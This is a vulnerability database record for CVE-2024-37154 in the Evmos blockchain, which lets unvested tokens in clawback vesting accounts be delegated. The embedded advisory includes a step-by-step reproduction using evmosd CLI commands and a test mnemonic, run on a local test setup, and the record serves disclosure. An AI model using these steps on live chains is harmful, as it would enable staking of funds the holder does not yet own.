{"id":"CVE-2024-37154","aliases":["GHSA-7hrh-v6wp-53vw","GO-2024-2904"],"url":"https://o3.security/vulnerability/CVE-2024-37154","summary":"Evmos allows unvested token delegations","details":"### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nAt the moment, users are able to delegate tokens that have not yet been vested. This affects employees and grantees who have funds managed via `ClawbackVestingAccount`.\n\n### Patches\n_Has the problem been patched? What versions should users upgrade to?_\n\n[The PR linked to this advisory](https://github.com/evmos/evmos-ghsa-7hrh-v6wp-53vw/pull/1) includes part of the fix. The remainder is in a [second advisory on the Cosmos SDK fork](https://github.com/evmos/cosmos-sdk/security/advisories/GHSA-wj6f-x5wv-8pqv).\n\n### Workarounds\n_Is there a way for users to fix or remediate the vulnerability without upgrading?_\n\nThere is no effective workaround to fix or remediate this issue without a new release. The best solution is to contain the information about this vulnerability to minimize the number of users who know about it and can thus exploit it.\n\n### References\n_Are there any links users can visit to find out more?_\n\nSee the integration tests for more details on the exploit, or use the following to reproduce it on the CLI:\n\n1. Download `vesting_setup.json` with the following contents:\n```\n{\n  \"start_time\": 1679602272,\n  \"periods\": [\n    {\n      \"coins\": \"100000000000000000000aevmos\",\n      \"length_seconds\": 10 \n    },\n    {\n      \"coins\": \"100000000000000000000aevmos\",\n      \"length_seconds\": 259200000\n    }\n  ]\n}\n```\n\n2. Run the following CLI commands to reproduce the issue locally:\n```\nevmosd tx vesting create-clawback-vesting-account evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --vesting vesting_setup.json --from dev0 --fees 2000000000000000aevmos --home ~/.tmp-evmosd --yes\n\n# Verify that the balance contains zero locked tokens, 1000000000000000aevmos vested, 1000000000000000aevmos unvested\nevmosd q vesting balances evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd\n\nevmosd keys add key1 --recover --home ~/.tmp-evmosd\n# Enter the following mnemonic\nskate tell option purity cattle poverty street act bone govern way various\n\nevmosd q staking validators --home ~/.tmp-evmosd | grep operator_address\n\n# Substitute the operator address from the previous query\n# Note that this delegates 70% of the user's available stake\nevmosd tx staking delegate <operator_address> 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes\n\n# Re-run the same command\nevmosd tx staking delegate <operator_address> 70000000000000000000aevmos --fees 5000000000000000aevmos --gas 300000 --from key1 --home ~/.tmp-evmosd --yes\n\n# Note that the total delegations now exceed the user's vested balance\nevmosd q staking delegations evmos1rn7fmq6he0s4uz9mwzzqwwm7fmmepd39cusn0t --home ~/.tmp-evmosd\n```","published":"2024-06-06T19:04:08.386Z","modified":"2026-08-12T03:51:11.872320659Z","cvss":{"score":5.3,"severity":"MEDIUM","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},"epss":null,"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"Go","name":"github.com/evmos/evmos/v18","fixedVersion":null},{"ecosystem":"Go","name":"github.com/evmos/evmos/v17","fixedVersion":null},{"ecosystem":"Go","name":"github.com/evmos/evmos/v16","fixedVersion":null},{"ecosystem":"Go","name":"github.com/evmos/evmos/v15","fixedVersion":null},{"ecosystem":"Go","name":"github.com/evmos/evmos/v14","fixedVersion":null},{"ecosystem":"Go","name":"github.com/evmos/evmos/v13","fixedVersion":null},{"ecosystem":"Go","name":"github.com/evmos/evmos/v12","fixedVersion":null},{"ecosystem":"Go","name":"github.com/evmos/evmos/v11","fixedVersion":null},{"ecosystem":"Go","name":"github.com/evmos/evmos/v10","fixedVersion":null},{"ecosystem":"Go","name":"github.com/evmos/evmos/v9","fixedVersion":null},{"ecosystem":"Go","name":"github.com/evmos/evmos/v8","fixedVersion":null},{"ecosystem":"Go","name":"github.com/evmos/evmos/v7","fixedVersion":null},{"ecosystem":"Go","name":"github.com/evmos/evmos/v6","fixedVersion":null}],"fix":null,"references":[{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2024/37xxx/CVE-2024-37154.json"},{"type":"ADVISORY","url":"https://github.com/evmos/evmos/security/advisories/GHSA-7hrh-v6wp-53vw"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2024-37154"},{"type":"PACKAGE","url":"https://github.com/evmos/evmos"},{"type":"WEB","url":"https://pkg.go.dev/vuln/GO-2024-2904"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-08-12T03:51:11.872320659Z"}}